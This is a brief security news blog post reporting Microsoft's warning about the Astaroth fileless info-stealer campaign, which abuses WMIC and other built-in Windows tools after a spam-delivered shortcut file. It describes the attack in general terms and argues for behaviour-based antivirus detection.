Microsoft warns about fileless malware codename Astaroth

Cybercrime + Malware + fileless malware LewisR todayJuly 11, 2019 344 173 5

share close

We see more warning about ongoing malware campaigns that are distributing the Astaroth malware using fileless and living-off-the-land techniques which make it almost impossible for traditional antivirus solutions to spot the ongoing attacks.

Recently a piece of malware slipped under the radar of Windows Defender free antivirus and was only highlighted to the team at microsoft once a huge and sudden spike was detected from using the Windows Management Instrumentation Command-line (WMIC) tool, a legitimate tool shipped with all modern versions of windows.

The malware campaign consisted of a huge spam operation that was sending out emails with a link to a website hosting a .LNK shortcut file. If a user was careless to download and run this file, it would launch the WMIC tool, and then a plethora of other legitimate Windows tools, one after the other.

The malware continues by its malicious behaviour by downloading further code and executing solely in memory — in what’s called fileless execution — and without saving any files on disk, making the job of classic antivirus software impossible, as they would have no file on disk to scan.

Astaroth attack chain

Image: Microsoft

Eventually Astaroth trojan, a known info-stealer can dump credentials for the majority of apps, and upload the stolen data to a remote server.

Whats next?

The next step in the evolution of modern antivirus products is shifting from a classic file signature detection mode.

A new approach is now required using AI behavioral-driven approach which will detect “invisible” actions like fileless (in-memory) execution.

Written by: LewisR

Tagged as: , , , , , .

Rate it
Previous post

Post comments (0)

Leave a reply

Your email address will not be published. Required fields are marked *

  • +44 (0) 203 744 7422